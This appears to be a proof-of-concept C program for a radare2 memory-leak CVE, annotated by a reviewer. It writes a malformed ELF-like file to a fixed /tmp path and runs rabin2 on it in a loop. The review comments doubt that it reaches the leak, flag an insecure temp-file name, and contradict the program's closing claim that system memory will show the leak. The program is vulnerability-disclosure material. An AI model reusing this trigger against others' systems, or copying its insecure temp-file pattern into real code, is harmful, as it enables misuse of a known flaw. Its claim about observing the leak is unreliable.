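/* CVE-2025-60359 PoC - radare2 r_bin_object_new Memory Leak
* This PoC is intended to trigger a memory leak in the r_bin_object_new
* function by repeatedly processing a crafted binary file with radare2 tools.
* Each iteration starts a separate rabin2 process, and the operating system
* reclaims a process's memory when it exits, so the leak does not accumulate
* across iterations; confirming it (or confirming a fix) requires a leak
* detector attached to rabin2 itself.
*/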
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Create a minimal malformed ELF-like binary to trigger r_bin_object_new */
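/**
 * Write the PoC input file: a short ELF-like header followed by 4096 bytes
 * of 0xff filler.
 *
 * @param filename  Path of the file to create or truncate.
 * @return 0 when every byte was written and the stream closed cleanly,
 *         -1 when filename is NULL, the file cannot be opened, a write is
 *         short, or fclose() reports an error.
 */
int create_malformed_binary(const char *filename) {
    /*
     * Header bytes are unchanged from the original listing.
     * NOTE(review): the array holds 56 bytes, fewer than the 64 bytes of an
     * ELF64 header, so the remaining header fields come from the 0xff filler
     * written below. Whether a parser reaches r_bin_object_new's leaking path
     * with this input cannot be confirmed from this file alone.
     */
    static const unsigned char elf_header[] = {
        0x7f, 0x45, 0x4c, 0x46, /* ELF magic */
        0x02, 0x01, 0x01, 0x00, /* 64-bit, little-endian */
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x02, 0x00, 0x3e, 0x00, /* ET_EXEC, x86-64 */
        0x01, 0x00, 0x00, 0x00, /* version */
        0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,
        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    };
    unsigned char corrupted_data[4096];
    FILE *fp;
    int rc = 0;

    /* fopen(NULL, ...) is undefined behavior; reject it up front. */
    if (!filename) {
        return -1;
    }

    fp = fopen(filename, "wb");
    if (!fp) {
        return -1;
    }

    memset(corrupted_data, 0xff, sizeof corrupted_data);

    /* A short write would silently produce a different test input. */
    if (fwrite(elf_header, 1, sizeof elf_header, fp) != sizeof elf_header ||
        fwrite(corrupted_data, 1, sizeof corrupted_data, fp) != sizeof corrupted_data) {
        rc = -1;
    }

    /* fclose() flushes buffered data, so its result is part of the write. */
    if (fclose(fp) != 0) {
        rc = -1;
    }

    return rc;
}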
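/**
 * Driver: writes the test input once, then runs `rabin2 -I` on it
 * `iterations` times (argv[1], default 1000), discarding rabin2's output.
 *
 * @return 0 on completion; 1 when the iteration count is not a valid
 *         non-negative integer, the input file cannot be written, the
 *         command line does not fit its buffer, or system() fails to start
 *         the command.
 */
int main(int argc, char *argv[]) {
    /*
     * NOTE(review): a fixed, predictable file name in a shared temporary
     * directory can be pre-created or symlinked by another local user
     * (CWE-377). Run this only in an isolated scratch environment, or switch
     * to a privately created directory.
     */
    const char *binary = "/tmp/malformed_target";
    int iterations = 1000;
    char cmd[256];
    int cmd_len;

    if (argc > 1) {
        /* strtol, unlike atoi, lets us reject garbage and out-of-range input. */
        char *end = NULL;
        long parsed;

        errno = 0;
        parsed = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE ||
            parsed < 0 || parsed > INT_MAX) {
            fprintf(stderr, "usage: %s [iterations]\n", argv[0]);
            return 1;
        }
        iterations = (int)parsed;
    }

    printf("[+] CVE-2025-60359 PoC - radare2 Memory Leak\n");
    printf("[+] Creating malformed binary: %s\n", binary);
    if (create_malformed_binary(binary) != 0) {
        perror("create_malformed_binary");
        return 1;
    }

    /* The command is loop-invariant: build and validate it once. */
    cmd_len = snprintf(cmd, sizeof(cmd), "rabin2 -I %s > /dev/null 2>&1", binary);
    if (cmd_len < 0 || (size_t)cmd_len >= sizeof(cmd)) {
        fprintf(stderr, "command line too long\n");
        return 1;
    }

    printf("[+] Triggering memory leak via %d iterations...\n", iterations);
    for (int i = 0; i < iterations; i++) {
        /* Use rabin2 to analyze the binary, triggering r_bin_object_new */
        if (system(cmd) == -1) {
            perror("system");
            return 1;
        }
        if (i % 100 == 0) {
            printf("[*] Iteration %d/%d\n", i, iterations);
        }
    }

    /*
     * NOTE(review): every iteration is a separate rabin2 process whose memory
     * is returned to the OS at exit, and stdout/stderr are discarded above,
     * so system-wide memory usage will not grow and a missing rabin2 goes
     * unnoticed. To verify the leak or a fix, run rabin2 on the file under a
     * leak detector and read its report.
     */
    printf("[+] Done. Check system memory usage to observe leak.\n");
    return 0;
}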